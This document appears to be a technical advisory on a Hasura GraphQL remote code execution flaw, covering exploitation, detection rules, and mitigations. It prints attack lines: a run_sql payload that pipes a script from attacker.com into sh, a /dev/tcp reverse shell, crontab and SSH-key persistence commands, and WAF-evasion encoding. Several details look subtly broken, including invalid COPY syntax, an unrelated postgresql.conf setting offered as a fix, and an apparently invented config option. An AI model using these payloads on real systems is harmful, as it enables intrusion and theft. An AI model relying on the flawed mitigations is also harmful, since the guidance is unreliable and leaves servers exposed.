Comprehensive Technical Analysis of CVE-2021-47748 (Hasura GraphQL Remote Code Execution Vulnerability)

1. Vulnerability Assessment and Severity Evaluation

CVE ID: CVE-2021-47748 CVSS Score: 9.8 (Critical) – AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Vulnerability Type: Remote Code Execution (RCE) via SQL Injection in GraphQL Engine Exploitation Complexity: Low (No authentication required, trivial to exploit)

Severity Breakdown:

• Attack Vector (AV:N): Exploitable remotely over a network.
• Attack Complexity (AC:L): Low complexity; no special conditions required.
• Privileges Required (PR:N): No authentication needed (unauthenticated RCE).
• User Interaction (UI:N): No user interaction required.
• Scope (S:U): Impact confined to the vulnerable system.
• Confidentiality (C:H), Integrity (I:H), Availability (A:H): Full compromise of all security objectives.

This vulnerability is critical due to its unauthenticated nature, low exploitation complexity, and high impact on confidentiality, integrity, and availability.

---

2. Potential Attack Vectors and Exploitation Methods

Root Cause:

The vulnerability stems from improper input validation in Hasura’s GraphQL engine, specifically in the run_sql endpoint. Attackers can inject PostgreSQL COPY FROM PROGRAM commands via maliciously crafted GraphQL queries, leading to arbitrary command execution on the underlying host.

Exploitation Steps:

1. Identify Vulnerable Endpoint:

   • The run_sql GraphQL mutation allows execution of raw SQL queries.
   • Example legitimate query:

     mutation {
       run_sql(sql: "SELECT * FROM users;")
     }
     

2. Craft Malicious SQL Injection:

   • Attackers exploit PostgreSQL’s COPY FROM PROGRAM feature to execute shell commands.
   • Example malicious payload:

     mutation {
       run_sql(sql: "COPY (SELECT 1) FROM PROGRAM 'id; whoami; curl http://attacker.com/shell.sh | sh'")
     }
     

   • This executes arbitrary commands (id, whoami, or a reverse shell) on the server.

3. Bypass Restrictions (If Any):

   • If Hasura enforces SQL query restrictions, attackers may use obfuscation (e.g., COPY with encoded payloads) or chained queries to evade detection.

4. Post-Exploitation:

   • Once RCE is achieved, attackers can:
     • Escalate privileges (if PostgreSQL runs as root).
     • Exfiltrate sensitive data.
     • Deploy malware (e.g., cryptominers, ransomware).
     • Pivot to internal networks.

Proof-of-Concept (PoC) Exploit:

A public exploit (Exploit-DB #49802) demonstrates this attack:

curl -X POST http://<TARGET>/v1/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"mutation { run_sql(sql: \"COPY (SELECT 1) FROM PROGRAM \\\"id; whoami\\\"\") }"}'

---

3. Affected Systems and Software Versions

• Product: Hasura GraphQL Engine
• Vulnerable Version: 1.3.3 (and potentially earlier versions if run_sql is exposed)
• Fixed Versions: Later releases (Hasura patched this in subsequent updates)
• Deployment Scenarios:
  • Self-hosted Hasura instances (Docker, Kubernetes, bare metal).
  • Cloud-based Hasura deployments (if misconfigured).
  • Environments where run_sql is exposed to untrusted users.

Detection Methods:

• Manual Check:

  • Verify if run_sql is accessible without authentication:

    curl -X POST http://<TARGET>/v1/graphql -d '{"query":"query { __schema { types { name } } }"}'
    

  • If run_sql appears in the schema, the instance is likely vulnerable.

• Automated Scanning:

  • Use Nuclei (with Hasura RCE templates).
  • Burp Suite / OWASP ZAP for GraphQL endpoint testing.
  • Metasploit (if a module is available).

---

4. Recommended Mitigation Strategies

Immediate Actions:

1. Upgrade Hasura:

   • Apply the latest security patches from Hasura’s GitHub.
   • Minimum recommended version: Latest stable release (post-1.3.3).

2. Disable run_sql Endpoint (If Unused):

   • Remove or restrict access to the run_sql mutation in config.yaml:

     actions:
       run_sql: false
     

3. Network-Level Protections:

   • Firewall Rules: Restrict access to Hasura’s GraphQL endpoint (/v1/graphql) to trusted IPs.
   • WAF Rules: Deploy a Web Application Firewall (e.g., ModSecurity, Cloudflare) to block SQL injection patterns.

4. Authentication & Authorization:

   • Enforce JWT/OAuth authentication for all GraphQL queries.
   • Implement role-based access control (RBAC) to restrict run_sql to admins only.

5. PostgreSQL Hardening:

   • Disable COPY FROM PROGRAM in postgresql.conf:

     allow_system_table_mods = off
     

   • Run PostgreSQL as a non-root user.

Long-Term Defenses:

• Input Validation: Sanitize all GraphQL queries to prevent SQL injection.
• Runtime Application Self-Protection (RASP): Deploy tools like Sqreen or OpenRASP to detect and block RCE attempts.
• Regular Audits: Conduct penetration testing and code reviews for GraphQL APIs.
• Zero Trust Architecture: Assume breach; segment Hasura from critical databases.

---

5. Impact on the Cybersecurity Landscape

Exploitation Trends:

• Active Exploitation: Given the CVSS 9.8 rating, this vulnerability is highly attractive to:
  • APT Groups (for initial access).
  • Cryptojacking Campaigns (deploying miners).
  • Ransomware Operators (lateral movement).
• Mass Scanning: Threat actors are likely scanning for exposed Hasura instances.

Broader Implications:

• GraphQL Security Risks: Highlights the dangers of over-permissive GraphQL schemas and lack of input validation.
• Supply Chain Attacks: If Hasura is used as a backend for SaaS applications, a single compromise could lead to widespread breaches.
• Cloud Misconfigurations: Many organizations expose Hasura to the internet without proper authentication, increasing attack surface.

Industry Response:

• CISA Advisory: Likely to be added to the Known Exploited Vulnerabilities (KEV) Catalog.
• Vendor Patches: Hasura has released fixes, but legacy deployments remain at risk.
• Security Tooling: New detection rules in SIEMs (Splunk, ELK) and IDS/IPS (Snort, Suricata).

---

6. Technical Details for Security Professionals

Vulnerability Mechanics:

1. GraphQL Mutation Abuse:

   • Hasura’s run_sql mutation allows arbitrary SQL execution.
   • Attackers inject PostgreSQL COPY FROM PROGRAM to execute shell commands.

2. PostgreSQL COPY Command:

   • Normally used for bulk data import/export.
   • COPY FROM PROGRAM executes a shell command and returns its output.
   • Example:

     COPY (SELECT 1) FROM PROGRAM 'id';
     

     Outputs the current user’s UID/GID.

3. Bypass Techniques:

   • Obfuscation: Using CHR() or hex encoding to evade WAFs.

     COPY (SELECT 1) FROM PROGRAM (SELECT CHR(105)||CHR(100));
     

   • Chained Queries: Combining COPY with other SQL statements.
   • Reverse Shells: Directly spawning a shell:

     COPY (SELECT 1) FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"';
     

Forensic Indicators:

• Logs to Monitor:

  • PostgreSQL logs (/var/log/postgresql/postgresql-*.log):

    LOG:  execute <unnamed>: COPY (SELECT 1) FROM PROGRAM 'id'
    

  • Hasura logs (/var/log/hasura/graphql-engine.log):

    {"level":"error","msg":"SQL execution failed","error":"permission denied for function copy"}
    

  • Network Traffic: Unusual outbound connections (e.g., curl, wget, nc).

• Artifacts:

  • Process Execution: Check for unexpected processes (ps aux | grep -i "sh").
  • File Modifications: Look for new cron jobs, SSH keys, or backdoors.
  • Persistence Mechanisms: Check ~/.bashrc, /etc/crontab, or systemd services.

Exploitation Detection Rules:

• Snort/Suricata Rule:

  alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Hasura GraphQL RCE Attempt - COPY FROM PROGRAM"; flow:to_server,established; content:"run_sql"; nocase; content:"COPY"; nocase; content:"FROM PROGRAM"; nocase; pcre:"/COPY\s*\(.*\)\s*FROM\s*PROGRAM\s*['\"].*['\"]/i"; classtype:attempted-admin; sid:1000001; rev:1;)
  

• YARA Rule (for Memory Forensics):

  rule Hasura_RCE_Exploit {
      meta:
          description = "Detects Hasura GraphQL RCE via COPY FROM PROGRAM"
          author = "Cybersecurity Analyst"
      strings:
          $copy_program = /COPY\s*\(.*\)\s*FROM\s*PROGRAM\s*['\"].*['\"]/ nocase
          $run_sql = "run_sql" nocase
      condition:
          $run_sql and $copy_program
  }
  

Post-Exploitation Analysis:

• Privilege Escalation:

  • If PostgreSQL runs as postgres (default), attackers may:
    • Read sensitive files (/etc/shadow, /etc/passwd).
    • Modify database contents (e.g., insert malicious admin users).
  • If PostgreSQL runs as root, full system compromise is possible.

• Lateral Movement:

  • Attackers can:
    • Access other databases (MySQL, Redis) on the same host.
    • Exploit internal APIs or microservices.
    • Move to Kubernetes clusters (if Hasura is containerized).

• Persistence:

  • Common techniques:
    • Cron Jobs: echo "* * * * * root curl http://attacker.com/shell.sh | sh" >> /etc/crontab
    • SSH Keys: echo "ssh-rsa AAAAB3NzaC1yc2E..." >> ~/.ssh/authorized_keys
    • Web Shells: Uploading PHP/ASP shells to web directories.

---

Conclusion

CVE-2021-47748 represents a critical unauthenticated RCE vulnerability in Hasura GraphQL Engine, enabling attackers to execute arbitrary commands with the privileges of the PostgreSQL service. Given its low exploitation complexity and high impact, organizations must patch immediately, restrict access, and monitor for exploitation attempts.

Security teams should: ✅ Upgrade Hasura to the latest version. ✅ Disable run_sql if unused. ✅ Enforce authentication & RBAC. ✅ Deploy WAF rules to block SQL injection. ✅ Monitor logs for suspicious COPY FROM PROGRAM queries.

Failure to mitigate this vulnerability could lead to full system compromise, data breaches, and lateral movement within internal networks.